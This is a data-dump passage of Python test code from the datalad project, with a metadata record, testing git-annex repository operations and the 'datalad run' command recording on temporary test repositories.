# 15 + 17sec on travis\[email protected](\"cls\", [GitRepo, AnnexRepo])\n@with_tempfile(mkdir=True)\ndef test_files_split_exc(topdir=None, *, cls):\n r = cls(topdir)\n # absent files -- should not crash with \"too long\" but some other more\n # meaningful exception\n files = [\"f\" * 100 + \"%04d\" % f for f in range(100000)]\n if isinstance(r, AnnexRepo):\n # Annex'es add first checks for what is being added and does not fail\n # for non existing files either ATM :-/ TODO: make consistent etc\n r.add(files)\n else:\n with assert_raises(Exception) as ecm:\n r.add(files)\n assert_not_in('too long', str(ecm.value))\n assert_not_in('too many', str(ecm.value))\n\n\n# with 204 (/ + (98+3)*2 + /) chars guaranteed, we hit \"filename too long\" quickly on windows\n# so we are doomed to shorten the filepath for testing on windows. Since the limits are smaller\n# on windows (16k vs e.g. 1m on linux in CMD_MAX_ARG), it would already be a \"struggle\" for it,\n# we also reduce number of dirs/files\n_ht_len, _ht_n = (48, 20) if on_windows else (98, 100)\n\n_HEAVY_TREE = {\n # might already run into 'filename too long' on windows probably\n \"d\" * _ht_len + '%03d' % d: {\n # populate with not entirely unique but still not all identical (empty) keys.\n # With content unique to that filename we would still get 100 identical\n # files for each key, thus possibly hitting regressions in annex like\n # https://git-annex.branchable.com/bugs/significant_performance_regression_impacting_datal/\n # but also would not hit filesystem as hard as if we had all the keys unique.\n 'f' * _ht_len + '%03d' % f: str(f)\n for f in range(_ht_n)\n }\n for d in range(_ht_n)\n}\n\n# @known_failure_windows # might fail with some older annex `cp` failing to set permissions\n@slow # 313s well -- if errors out - only 3 sec\[email protected](\"cls\", [GitRepo, AnnexRepo])\n@with_tree(tree=_HEAVY_TREE)\ndef test_files_split(topdir=None, *, cls):\n from glob import glob\n r = cls(topdir)\n dirs = glob(op.join(topdir, '*'))\n files = glob(op.join(topdir, '*', '*'))\n\n r.add(files)\n r.commit(files=files)\n\n # Let's modify and do dl.add for even a heavier test\n # Now do for real on some heavy directory\n import datalad.api as dl\n for f in files:\n os.unlink(f)\n with open(f, 'w') as f:\n f.write('1')\n dl.save(dataset=r.path, path=dirs, result_renderer=\"disabled\")\n\n\n@skip_if_on_windows\n@skip_if_root\n@with_tree({\n 'repo': {\n 'file1': 'file1',\n 'file2': 'file2'\n }\n})\ndef test_ro_operations(path=None):\n # This test would function only if there is a way to run sudo\n # non-interactively, e.g. on Travis or on your local (watchout!) system\n # after you ran sudo command recently.\n run = Runner().run\n sudochown = lambda cmd: run(['sudo', '-n', 'chown'] + cmd)\n\n repo = AnnexRepo(op.join(path, 'repo'), init=True)\n repo.add('file1')\n repo.commit()\n\n # make a clone\n repo2 = repo.clone(repo.path, op.join(path, 'clone'))\n repo2.get('file1')\n\n # progress forward original repo and fetch (but nothing else) it into repo2\n repo.add('file2')\n repo.commit()\n repo2.fetch(DEFAULT_REMOTE)\n\n # Assure that regardless of umask everyone could read it all\n run(['chmod', '-R', 'a+rX', repo2.path])\n try:\n # To assure that git/git-annex really cannot acquire a lock and do\n # any changes (e.g. merge git-annex branch), we make this repo owned by root\n sudochown(['-R', 'root', repo2.path])\n except Exception as exc:\n # Exception could be CommandError or IOError when there is no sudo\n raise SkipTest(\"Cannot run sudo chown non-interactively: %s\" % exc)\n\n # recent git would refuse to run git status in repository owned by someone else\n # which could lead to odd git-annex errors before 10.20220504-55-gaf0d85446 AKA 10.20220525~13\n # see https://github.com/datalad/datalad/issues/5665 and after an informative error\n # https://github.com/datalad/datalad/issues/6708\n # To overcome - explicitly add the path into allowed\n dl_cfg.add('safe.directory', repo2.path, scope='global')\n\n try:\n assert not repo2.get('file1') # should work since file is here already\n repo2.status() # should be Ok as well\n # and we should get info on the file just fine\n assert repo2.info('file1')\n # The tricky part is the repo_info which might need to update\n # remotes UUID -- by default it should fail!\n # Oh well -- not raised on travis... whatever for now\n #with assert_raises(CommandError):\n # repo2.repo_info()\n # but should succeed if we disallow merges\n repo2.repo_info(merge_annex_branches=False)\n # and ultimately the ls which uses it\n try:\n from datalad.api import ls\n ls(repo2.path, all_=True, long_=True)\n except ImportError:\n raise SkipTest(\n \"No `ls` command available (provided by -deprecated extension)\")\n finally:\n sudochown(['-R', str(os.geteuid()), repo2.path])\n\n # just check that all is good again\n repo2.repo_info()\n\n\n@skip_if_on_windows\n@skip_if_root\n@with_tree({\n 'file1': 'file1',\n})\ndef test_save_noperms(path=None):\n # check that we do report annex error messages\n\n # This test would function only if there is a way to run sudo\n # non-interactively, e.g. on Travis or on your local (watchout!) system\n # after you ran sudo command recently.\n repo = AnnexRepo(path, init=True)\n\n run = Runner().run\n sudochown = lambda cmd: run(['sudo', '-n', 'chown'] + cmd)\n\n try:\n # To assure that git/git-annex really cannot acquire a lock and do\n # any changes (e.g. merge git-annex branch), we make this repo owned by root\n sudochown(['-R', 'root:root', str(repo.pathobj / 'file1')])\n except Exception as exc:\n # Exception could be CommandError or IOError when there is no sudo\n raise SkipTest(\"Cannot run sudo chown non-interactively: %s\" % exc)\n\n try:\n repo.save(paths=['file1'])\n except CommandError as exc:\n res = exc.kwargs[\"stdout_json\"]\n assert_result_count(res, 1)\n assert_result_count(res, 1, file='file1',\n command='add', success=False)\n assert_in('permission denied', res[0]['error-messages'][0])\n finally:\n sudochown(['-R', str(os.geteuid()), repo.path])\n\n\ndef test_get_size_from_key():\n\n # see https://git-annex.branchable.com/internals/key_format/\n # BACKEND[-sNNNN][-mNNNN][-SNNNN-CNNNN]--NAME\n\n test_keys = {\"ANYBACKEND--NAME\": None,\n \"ANYBACKEND-s123-m1234--NAME-WITH-DASHES.ext\": 123,\n \"MD5E-s100-S10-C1--somen.ame\": 10,\n \"SHA256-s99-S10-C10--name\": 9,\n \"SHA256E-sNaN--name\": None, # debatable: None or raise?\n }\n\n invalid = [\"ANYBACKEND-S10-C30--missing-total\",\n \"s99-S10-C10--NOBACKEND\",\n \"MD5-s100-S5--no-chunk-number\"]\n\n for key in invalid:\n assert_raises(ValueError, AnnexRepo.get_size_from_key, key)\n\n for key, value in test_keys.items():\n eq_(AnnexRepo.get_size_from_key(key), value)\n\n\n@with_tempfile(mkdir=True)\ndef test_call_annex(path=None):\n ar = AnnexRepo(path, create=True)\n # we raise on mistakes\n with assert_raises(CommandError):\n ar._call_annex(['not-an-annex-command'])\n # and we get to know why\n try:\n ar._call_annex(['not-an-annex-command'])\n except CommandError as e:\n assert_in('Invalid argument', e.stderr)\n\n\n@with_tempfile\ndef test_whereis_zero_copies(path=None):\n repo = AnnexRepo(path, create=True)\n (repo.pathobj / \"foo\").write_text(\"foo\")\n repo.save()\n repo.drop([\"foo\"], options=[\"--force\"])\n\n for output in \"full\", \"uuids\", \"descriptions\":\n res = repo.whereis(files=[\"foo\"], output=output)\n if output == \"full\":\n assert_equal(res[\"foo\"], {})\n else:\n assert_equal(res, [[]])\n\n\n@with_tempfile(mkdir=True)\ndef test_whereis_batch_eqv(path=None):\n path = Path(path)\n\n repo_a = AnnexRepo(path / \"a\", create=True)\n (repo_a.pathobj / \"foo\").write_text(\"foo\")\n (repo_a.pathobj / \"bar\").write_text(\"bar\")\n (repo_a.pathobj / \"baz\").write_text(\"baz\")\n repo_a.save()\n\n repo_b = repo_a.clone(repo_a.path, str(path / \"b\"))\n repo_b.drop([\"bar\"])\n repo_b.drop([\"baz\"])\n repo_b.drop([\"baz\"], options=[\"--from=\" + DEFAULT_REMOTE, \"--force\"])\n\n files = [\"foo\", \"bar\", \"baz\"]\n info = repo_b.get_content_annexinfo(files)\n keys = [info[repo_b.pathobj / f]['key'] for f in files]\n\n for output in \"full\", \"uuids\", \"descriptions\":\n out_non_batch = repo_b.whereis(files=files, batch=False, output=output)\n assert_equal(out_non_batch,\n repo_b.whereis(files=files, batch=True, output=output))\n out_non_batch_keys = repo_b.whereis(files=keys, batch=False, key=True, output=output)\n # should be identical\n if output == 'full':\n # we need to map files to keys though\n assert_equal(out_non_batch_keys,\n {k: out_non_batch[f] for f, k in zip(files, keys)})\n else:\n assert_equal(out_non_batch, out_non_batch_keys)\n\n if external_versions['cmd:annex'] >= '8.20210903':\n # --batch-keys support was introduced\n assert_equal(out_non_batch_keys,\n repo_b.whereis(files=keys, batch=True, key=True, output=output))\n\n if external_versions['cmd:annex'] < '8.20210903':\n # --key= and --batch are incompatible.\n with assert_raises(ValueError):\n repo_b.whereis(files=files, batch=True, key=True)\n\n\ndef test_done_deprecation():\n with unittest.mock.patch(\"datalad.cmd.warnings.warn\") as warn_mock:\n _ = AnnexJsonProtocol(\"done\")\n warn_mock.assert_called_once()\n\n with unittest.mock.patch(\"datalad.cmd.warnings.warn\") as warn_mock:\n _ = AnnexJsonProtocol()\n warn_mock.assert_not_called()\n\n\ndef test_generator_annex_json_protocol():\n\n runner = Runner()\n stdin_queue = Queue()\n\n def json_object(count: int):\n json_template = '{{\"id\": \"some-id\", \"count\": {count}}}'\n return json_template.format(count=count).encode()\n\n count = 123\n stdin_queue.put(json_object(count=count))\n for result in runner.run(cmd=\"cat\", protocol=GeneratorAnnexJsonProtocol, stdin=stdin_queue):\n assert_equal(\n result,\n {\n \"id\": \"some-id\",\n \"count\": count,\n }\n )\n if count == 133:\n break\n count += 1\n stdin_queue.put(json_object(count=count))\n\n\ndef test_captured_exception():\n class RaiseMock:\n def add_(self, *args, **kwargs):\n raise CommandError(\"RaiseMock.add_\")\n\n with patch(\"datalad.support.annexrepo.super\") as repl_super:\n repl_super.return_value = RaiseMock()\n gen = AnnexRepo.add_(object(), [])\n assert_raises(CommandError, gen.send, None)\n\n\n@skip_if_on_windows\ndef test_stderr_rejecting_protocol_trigger():\n result_generator = GitWitlessRunner().run(\n \"echo ssss >&2\",\n protocol=GeneratorAnnexJsonNoStderrProtocol)\n\n try:\n tuple(result_generator)\n except CommandError as e:\n assert_in(\"ssss\", e.stderr)\n return\n assert_true(False)\n\n\n@skip_if_on_windows\ndef test_stderr_rejecting_protocol_ignore():\n\n result_generator = GitWitlessRunner().run(\n ['echo', '{\"status\": \"ok\"}'],\n protocol=GeneratorAnnexJsonNoStderrProtocol)\n assert_equal(tuple(result_generator), ({\"status\": \"ok\"},))\n" }, { "alpha_fraction": 0.5895057320594788, "alphanum_fraction": 0.5954243540763855, "avg_line_length": 35.899105072021484, "blob_id": "0c0324fc2efc74b88aa06935287c2e8f28e45e41", "content_id": "e73e9ac1f607cc14a9753b16651843ae16b409f6", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 28900, "license_type": "permissive", "max_line_length": 209, "num_lines": 783, "path": "/datalad/core/local/tests/test_run.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-; coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Partial testing of `run` commands.\n\nNote: Tests of `run` that involve `rerun` are in interface.tests.test_run.\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nimport os\nimport os.path as op\nimport sys\nfrom os import (\n mkdir,\n remove,\n)\nfrom unittest.mock import patch\n\nfrom datalad.api import (\n clone,\n run,\n)\nfrom datalad.cli.main import main\nfrom datalad.core.local.run import (\n _format_iospecs,\n _get_substitutions,\n format_command,\n run_command,\n)\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.exceptions import (\n CommandError,\n IncompleteResultsError,\n NoDatasetFound,\n)\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n OBSCURE_FILENAME,\n assert_false,\n assert_in,\n assert_in_results,\n assert_not_in,\n assert_not_in_results,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n create_tree,\n eq_,\n known_failure_windows,\n neq_,\n ok_,\n ok_exists,\n ok_file_has_content,\n patch_config,\n swallow_logs,\n swallow_outputs,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import (\n chpwd,\n ensure_unicode,\n on_windows,\n)\n\ncat_command = 'cat' if not on_windows else 'type'\n\n\n@with_tempfile(mkdir=True)\ndef test_invalid_call(path=None):\n with chpwd(path):\n # no dataset, no luck\n assert_raises(NoDatasetFound, run, 'doesntmatter')\n # dirty dataset\n ds = Dataset(path).create()\n create_tree(ds.path, {'this': 'dirty'})\n assert_status('impossible', run('doesntmatter', on_failure='ignore'))\n\n\ndef last_commit_msg(repo):\n # ATTN: Pass branch explicitly so that this check works when we're on an\n # adjusted branch too (e.g., when this test is executed under Windows).\n return repo.format_commit(\"%B\", DEFAULT_BRANCH)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_basics(path=None, nodspath=None):\n ds = Dataset(path).create()\n last_state = ds.repo.get_hexsha()\n # run inside the dataset\n with chpwd(path), \\\n swallow_outputs():\n # provoke command failure\n res = ds.run('7i3amhmuch9invalid', on_failure=\"ignore\",\n result_renderer=None)\n assert_result_count(res, 1, action=\"run\", status=\"error\")\n run_res = [r for r in res if r[\"action\"] == \"run\"][0]\n # let's not speculate that the exit code is always 127\n ok_(run_res[\"run_info\"][\"exit\"] > 0)\n eq_(last_state, ds.repo.get_hexsha())\n # now one that must work\n res = ds.run('cd .> empty', message='TEST')\n assert_repo_status(ds.path)\n assert_result_count(res, 3)\n # TODO 'state' is still untracked!!!\n assert_result_count(res, 1, action='add',\n path=op.join(ds.path, 'empty'), type='file')\n assert_result_count(res, 1, action='save', path=ds.path)\n commit_msg = last_commit_msg(ds.repo)\n ok_(commit_msg.startswith('[DATALAD RUNCMD] TEST'))\n # crude test that we have a record for the PWD\n assert_in('\"pwd\": \".\"', commit_msg)\n last_state = ds.repo.get_hexsha()\n # now run a command that will not alter the dataset\n noop_cmd = ':'\n res = ds.run(noop_cmd, message='NOOP_TEST')\n assert_result_count(res, 1, action='save', status='notneeded')\n eq_(last_state, ds.repo.get_hexsha())\n # We can also run the command via a single-item list because this is\n # what the CLI interface passes in for quoted commands.\n res = ds.run([noop_cmd], message='NOOP_TEST')\n assert_result_count(res, 1, action='save', status='notneeded')\n\n # run outside the dataset, should still work but with limitations\n with chpwd(nodspath), \\\n swallow_outputs():\n res = ds.run('cd . > empty2', message='TEST')\n assert_result_count(res, 1, action='add',\n path=op.join(ds.path, 'empty2'),\n type='file', status='ok')\n assert_result_count(res, 1, action='save', status='ok')\n\n # running without a command is a noop\n with chpwd(path):\n with swallow_logs(new_level=logging.WARN) as cml:\n ds.run()\n assert_in(\"No command given\", cml.out)\n\n # running without a command is a noop\n with chpwd(path):\n with swallow_logs(new_level=logging.INFO) as cml:\n assert_raises(\n IncompleteResultsError,\n ds.run,\n '7i3amhmuch9invalid',\n # this is on_failure=stop by default\n )\n # must give recovery hint in Python notation\n assert_in(\"can save the changes with \\\"Dataset(\", cml.out)\n\n with chpwd(path):\n # make sure that an invalid input declaration prevents command\n # execution by default\n assert_raises(\n IncompleteResultsError,\n ds.run, 'cd .> dummy0', inputs=['not-here'])\n ok_(not (ds.pathobj / 'dummy0').exists())\n # but the default behavior can be changed\n assert_raises(\n IncompleteResultsError,\n ds.run, 'cd .> dummy0', inputs=['not-here'],\n on_failure='continue')\n # it has stilled failed, but the command got executed nevertheless\n ok_((ds.pathobj / 'dummy0').exists())\n\n\n@known_failure_windows\n# ^ For an unknown reason, appveyor started failing after we removed\n# receive.autogc=0 and gc.auto=0 from our common git options (gh-3482).\n# moreover the usage of unicode in the file names also breaks this on windows\n@with_tempfile(mkdir=True)\ndef test_py2_unicode_command(path=None):\n # Avoid OBSCURE_FILENAME to avoid windows-breakage (gh-2929).\n ds = Dataset(path).create()\n touch_cmd = \"import sys; open(sys.argv[1], 'w').write('')\"\n cmd_str = u\"{} -c \\\"{}\\\" {}\".format(sys.executable,\n touch_cmd,\n u\"bβ0.dat\")\n ds.run(cmd_str)\n assert_repo_status(ds.path)\n ok_exists(op.join(path, u\"bβ0.dat\"))\n\n # somewhat desperate attempt to detect our own Github CI tests on a\n # crippled filesystem (VFAT) that is so crippled that it doesn't handle\n # what is needed here. It just goes mad with encoded bytestrings:\n # CommandError: ''python -c '\"'\"'import sys; open(sys.argv[1], '\"'\"'\"'\"'\"'\"'\"'\"'w'\"'\"'\"'\"'\"'\"'\"'\"').write('\"'\"'\"'\"'\"'\"'\"'\"''\"'\"'\"'\"'\"'\"'\"'\"')'\"'\"' '\"'\"' β1 '\"'\"''' failed with exitcode 1 under /crippledfs/\n if not on_windows and os.environ.get('TMPDIR', None) != '/crippledfs': # FIXME\n ds.run([sys.executable, \"-c\", touch_cmd, u\"bβ1.dat\"])\n assert_repo_status(ds.path)\n ok_exists(op.join(path, u\"bβ1.dat\"))\n\n # Send in a list of byte-strings to mimic a py2 command-line\n # invocation.\n ds.run([s.encode(\"utf-8\")\n for s in [sys.executable, \"-c\", touch_cmd, u\" β1 \"]])\n assert_repo_status(ds.path)\n ok_exists(op.join(path, u\" β1 \"))\n\n assert_in_results(\n ds.run(u\"bβ2.dat\", result_renderer=None, on_failure=\"ignore\"),\n status=\"error\", action=\"run\")\n\n\n@with_tempfile(mkdir=True)\ndef test_sidecar(path=None):\n ds = Dataset(path).create()\n # Simple sidecar message checks.\n ds.run(\"cd .> dummy0\", message=\"sidecar arg\", sidecar=True)\n assert_not_in('\"cmd\":', ds.repo.format_commit(\"%B\"))\n\n ds.config.set(\"datalad.run.record-sidecar\", \"false\", scope=\"local\")\n ds.run(\"cd .> dummy1\", message=\"sidecar config\")\n\n assert_in('\"cmd\":', last_commit_msg(ds.repo))\n\n ds.config.set(\"datalad.run.record-sidecar\", \"true\", scope=\"local\")\n ds.run(\"cd .> dummy2\", message=\"sidecar config\")\n assert_not_in('\"cmd\":', last_commit_msg(ds.repo))\n\n # Don't break when config.get() returns multiple values. Here it's two\n # values in .gitconfig, but a more realistic scenario is a value in\n # $repo/.git/config that overrides a setting in ~/.config/git/config.\n ds.config.add(\"datalad.run.record-sidecar\", \"false\", scope=\"local\")\n ds.run(\"cd .> dummy3\", message=\"sidecar config\")\n assert_in('\"cmd\":', last_commit_msg(ds.repo))\n\n\n # make sure sidecar file is committed when explicitly specifying outputs\n ds.run(\"cd .> dummy4\",\n outputs=[\"dummy4\"],\n sidecar=True,\n explicit=True,\n message=\"sidecar + specified outputs\")\n assert_not_in('\"cmd\":', last_commit_msg(ds.repo))\n assert_repo_status(ds.path)\n\n\n\n\n@with_tree(tree={\"to_remove\": \"abc\"})\ndef test_run_save_deletion(path=None):\n ds = Dataset(path).create(force=True)\n ds.save()\n ds.run(\"{} to_remove\".format(\"del\" if on_windows else \"rm\"))\n assert_repo_status(ds.path)\n\n\n@with_tempfile(mkdir=True)\ndef test_run_from_subds(path=None):\n subds = Dataset(path).create().create(\"sub\")\n subds.run(\"cd .> foo\")\n assert_repo_status(subds.path)\n\n\n@with_tree(tree={\"sub\": {\"input\": \"\"}})\ndef test_run_from_subds_gh3551(path=None):\n ds = Dataset(path).create(force=True)\n ds.save()\n ds.create(\"output\")\n with chpwd(op.join(ds.path, \"sub\")):\n assert_in_results(\n run(\"echo\",\n inputs=[op.join(op.pardir, \"sub\", \"input\")],\n outputs=[op.join(op.pardir, \"output\")],\n return_type=\"list\", result_filter=None, result_xfm=None),\n action=\"get\",\n status=\"notneeded\")\n assert_repo_status(ds.path)\n\n subds_path = op.join(\"output\", \"subds\")\n ds.create(subds_path)\n with chpwd(op.join(ds.path, \"sub\")):\n output_dir = op.join(op.pardir, \"output\", \"subds\")\n # The below command is trying to be compatible. It could be made better\n # (e.g., actually using the input file) by someone that knows something\n # about Windows.\n assert_in_results(\n run(\"cd .> {}\".format(op.join(output_dir, \"f\")),\n inputs=[op.join(op.pardir, \"sub\", \"input\")],\n outputs=[output_dir],\n return_type=\"list\", result_filter=None, result_xfm=None),\n action=\"save\",\n status=\"ok\")\n assert_repo_status(ds.path)\n subds = Dataset(op.join(ds.path, subds_path))\n ok_exists(op.join(subds.path, \"f\"))\n if not ds.repo.is_managed_branch(): # FIXME\n # This check fails on Windows:\n # https://github.com/datalad/datalad/pull/3747/checks?check_run_id=248506560#step:8:254\n ok_(subds.repo.file_has_content(\"f\"))\n\n\n@with_tempfile(mkdir=True)\ndef test_run_assume_ready(path=None):\n ds = Dataset(path).create()\n repo = ds.repo\n adjusted = repo.is_managed_branch()\n\n # --assume-ready=inputs\n\n (repo.pathobj / \"f1\").write_text(\"f1\")\n ds.save()\n\n def cat_cmd(fname):\n return [sys.executable, \"-c\",\n \"import sys; print(open(sys.argv[-1]).read())\",\n fname]\n\n assert_in_results(\n ds.run(cat_cmd(\"f1\"), inputs=[\"f1\"]),\n action=\"get\", type=\"file\")\n # Same thing, but without the get() call.\n assert_not_in_results(\n ds.run(cat_cmd(\"f1\"), inputs=[\"f1\"], assume_ready=\"inputs\"),\n action=\"get\", type=\"file\")\n\n ds.drop(\"f1\", reckless='kill')\n if not adjusted:\n # If the input is not actually ready, the command will fail.\n assert_in_results(\n ds.run(cat_cmd(\"f1\"), inputs=[\"f1\"], assume_ready=\"inputs\",\n on_failure=\"ignore\", result_renderer=None),\n action=\"run\", status=\"error\")\n\n # --assume-ready=outputs\n\n def unlink_and_write_cmd(fname):\n # This command doesn't care whether the output file is unlocked because\n # it removes it ahead of time anyway.\n return [sys.executable, \"-c\",\n \"import sys; import os; import os.path as op; \"\n \"f = sys.argv[-1]; op.lexists(f) and os.unlink(f); \"\n \"open(f, mode='w').write(str(sys.argv))\",\n fname]\n\n (repo.pathobj / \"f2\").write_text(\"f2\")\n ds.save()\n\n res = ds.run(unlink_and_write_cmd(\"f2\"), outputs=[\"f2\"])\n if not adjusted:\n assert_in_results(res, action=\"unlock\", type=\"file\")\n # Same thing, but without the unlock() call.\n res = ds.run(unlink_and_write_cmd(\"f2\"), outputs=[\"f2\"],\n assume_ready=\"outputs\")\n assert_not_in_results(res, action=\"unlock\", type=\"file\")\n\n # --assume-ready=both\n\n res = ds.run(unlink_and_write_cmd(\"f2\"),\n outputs=[\"f2\"], inputs=[\"f2\"])\n assert_in_results(res, action=\"get\", type=\"file\")\n if not adjusted:\n assert_in_results(res, action=\"unlock\", type=\"file\")\n\n res = ds.run(unlink_and_write_cmd(\"f2\"),\n outputs=[\"f2\"], inputs=[\"f2\"],\n assume_ready=\"both\")\n assert_not_in_results(res, action=\"get\", type=\"file\")\n assert_not_in_results(res, action=\"unlock\", type=\"file\")\n\n\n@with_tempfile()\n@with_tempfile()\ndef test_run_explicit(origpath=None, path=None):\n origds = Dataset(origpath).create()\n (origds.pathobj / \"test-annex.dat\").write_text('content')\n origds.save()\n ds = clone(origpath, path)\n\n assert_false(ds.repo.file_has_content(\"test-annex.dat\"))\n\n create_tree(ds.path, {\"dirt_untracked\": \"untracked\",\n \"dirt_modified\": \"modified\"})\n ds.save(\"dirt_modified\", to_git=True)\n with open(op.join(path, \"dirt_modified\"), \"a\") as ofh:\n ofh.write(\", more\")\n\n # We need explicit=True to run with dirty repo.\n assert_status(\n \"impossible\",\n ds.run(f\"{cat_command} test-annex.dat test-annex.dat >doubled.dat\",\n inputs=[\"test-annex.dat\"],\n on_failure=\"ignore\"))\n\n hexsha_initial = ds.repo.get_hexsha()\n # If we specify test-annex.dat as an input, it will be retrieved before the\n # run.\n ds.run(f\"{cat_command} test-annex.dat test-annex.dat >doubled.dat\",\n inputs=[\"test-annex.dat\"], explicit=True,\n result_renderer='disabled')\n ok_(ds.repo.file_has_content(\"test-annex.dat\"))\n # We didn't commit anything because outputs weren't specified.\n assert_false(ds.repo.file_has_content(\"doubled.dat\"))\n eq_(hexsha_initial, ds.repo.get_hexsha())\n\n # If an input doesn't exist, we just show the standard warning.\n with assert_raises(IncompleteResultsError):\n ds.run(\"ls\", inputs=[\"not-there\"], explicit=True,\n on_failure=\"stop\", result_renderer='disabled')\n\n remove(op.join(path, \"doubled.dat\"))\n\n hexsha_initial = ds.repo.get_hexsha()\n ds.run(f\"{cat_command} test-annex.dat test-annex.dat >doubled.dat\",\n inputs=[\"test-annex.dat\"], outputs=[\"doubled.dat\"],\n explicit=True, result_renderer='disabled')\n ok_(ds.repo.file_has_content(\"doubled.dat\"))\n assert_repo_status(ds.path, modified=[\"dirt_modified\"],\n untracked=['dirt_untracked'])\n neq_(hexsha_initial, ds.repo.get_hexsha())\n\n # Saving explicit outputs works from subdirectories.\n subdir = op.join(path, \"subdir\")\n mkdir(subdir)\n with chpwd(subdir):\n run(\"echo insubdir >foo\", explicit=True, outputs=[\"foo\"],\n result_renderer='disabled')\n ok_(ds.repo.file_has_content(op.join(\"subdir\", \"foo\")))\n\n\n@with_tree(tree={OBSCURE_FILENAME + u\".t\": \"obscure\",\n \"bar.txt\": \"b\",\n \"foo blah.txt\": \"f\"})\ndef test_inputs_quotes_needed(path=None):\n ds = Dataset(path).create(force=True)\n ds.save()\n cmd = \"import sys; open(sys.argv[-1], 'w').write('!'.join(sys.argv[1:]))\"\n # The string form of a command works fine when the inputs/outputs have\n # spaces ...\n cmd_str = \"{} -c \\\"{}\\\" {{inputs}} {{outputs[0]}}\".format(\n sys.executable, cmd)\n ds.run(cmd_str, inputs=[\"*.t*\"], outputs=[\"out0\"], expand=\"inputs\")\n expected = u\"!\".join(\n list(sorted([OBSCURE_FILENAME + u\".t\", \"bar.txt\", \"foo blah.txt\"])) +\n [\"out0\"])\n with open(op.join(path, \"out0\")) as ifh:\n eq_(ensure_unicode(ifh.read()), expected)\n # ... but the list form of a command does not. (Don't test this failure\n # with the obscure file name because we'd need to know its composition to\n # predict the failure.)\n cmd_list = [sys.executable, \"-c\", cmd, \"{inputs}\", \"{outputs[0]}\"]\n ds.run(cmd_list, inputs=[\"*.txt\"], outputs=[\"out0\"])\n ok_file_has_content(op.join(path, \"out0\"), \"bar.txt foo!blah.txt!out0\")\n\n\n@with_tree(tree={\"foo\": \"f\", \"bar\": \"b\"})\ndef test_inject(path=None):\n ds = Dataset(path).create(force=True)\n assert_repo_status(ds.path, untracked=['foo', 'bar'])\n list(run_command(\"nonsense command\",\n dataset=ds,\n inject=True,\n extra_info={\"custom_key\": \"custom_field\"}))\n msg = last_commit_msg(ds.repo)\n assert_in(\"custom_key\", msg)\n assert_in(\"nonsense command\", msg)\n\n\n@with_tempfile(mkdir=True)\ndef test_format_command_strip_leading_dashes(path=None):\n ds = Dataset(path).create()\n eq_(format_command(ds, [\"--\", \"cmd\", \"--opt\"]),\n '\"cmd\" \"--opt\"' if on_windows else \"cmd --opt\")\n eq_(format_command(ds, [\"--\"]), \"\")\n # Can repeat to escape.\n eq_(format_command(ds, [\"--\", \"--\", \"ok\"]),\n '\"--\" \"ok\"' if on_windows else \"-- ok\")\n # String stays as is.\n eq_(format_command(ds, \"--\"), \"--\")\n\n\n@with_tempfile(mkdir=True)\ndef test_run_cmdline_disambiguation(path=None):\n Dataset(path).create()\n with chpwd(path):\n # Without a positional argument starting a command, any option is\n # treated as an option to 'datalad run'.\n with swallow_outputs() as cmo:\n with patch(\"datalad.core.local.run._execute_command\") as exec_cmd:\n with assert_raises(SystemExit):\n main([\"datalad\", \"run\", \"--message\"])\n exec_cmd.assert_not_called()\n assert_in(\"message: expected one\", cmo.err)\n # If we want to pass an option as the first value of a command (e.g.,\n # because we are using a runscript with containers-run), we can do this\n # with \"--\".\n with patch(\"datalad.core.local.run._execute_command\") as exec_cmd:\n with assert_raises(SystemExit):\n main([\"datalad\", \"run\", \"--\", \"--message\"])\n exec_cmd.assert_called_once_with(\n '\"--message\"' if on_windows else \"--message\",\n path)\n\n # Our parser used to mishandle --version (gh-3067),\n # treating 'datalad run CMD --version' as 'datalad --version'.\n # but that is no longer the case and echo --version should work with or\n # without explicit \"--\" separator\n for sep in [[], ['--']]:\n with patch(\"datalad.core.local.run._execute_command\") as exec_cmd:\n with assert_raises(SystemExit):\n main([\"datalad\", \"run\"] + sep + [\"echo\", \"--version\"])\n exec_cmd.assert_called_once_with(\n '\"echo\" \"--version\"' if on_windows else \"echo --version\",\n path)\n\n\n@with_tempfile(mkdir=True)\ndef test_run_path_semantics(path=None):\n # Test that we follow path resolution from gh-3435: paths are relative to\n # dataset if a dataset instance is given and relative to the current\n # working directory otherwise.\n\n ds0 = Dataset(op.join(path, \"ds0\")).create()\n ds0_subdir = op.join(ds0.path, \"s0\")\n os.mkdir(ds0_subdir)\n\n # Although not useful, we can specify `dataset` as a string that lines up\n # with the one from the current directory.\n with chpwd(ds0_subdir):\n run(\"cd .> one\", dataset=\"..\")\n run(\"cd .> one\", outputs=[\"one\"], dataset=ds0.path)\n ok_exists(op.join(ds0_subdir, \"one\"))\n assert_repo_status(ds0.path)\n\n # Specify string dataset argument, running from another dataset ...\n\n ds1 = Dataset(op.join(path, \"ds1\")).create()\n ds1_subdir = op.join(ds1.path, \"s1\")\n os.mkdir(ds1_subdir)\n\n # ... producing output file in specified dataset\n with chpwd(ds1_subdir):\n run(\"cd .> {}\".format(op.join(ds0.path, \"two\")),\n dataset=ds0.path)\n ok_exists(op.join(ds0.path, \"two\"))\n assert_repo_status(ds0.path)\n\n # ... producing output file in specified dataset and passing output file as\n # relative to current directory\n with chpwd(ds1_subdir):\n out = op.join(ds0.path, \"three\")\n run(\"cd .> {}\".format(out), dataset=ds0.path, explicit=True,\n outputs=[op.relpath(out, ds1_subdir)])\n ok_exists(op.join(ds0.path, \"three\"))\n assert_repo_status(ds0.path)\n\n # ... producing output file outside of specified dataset, leaving it\n # untracked in the other dataset\n assert_repo_status(ds1.path)\n with chpwd(ds1_subdir):\n run(\"cd .> four\", dataset=ds0.path)\n assert_repo_status(ds1.path, 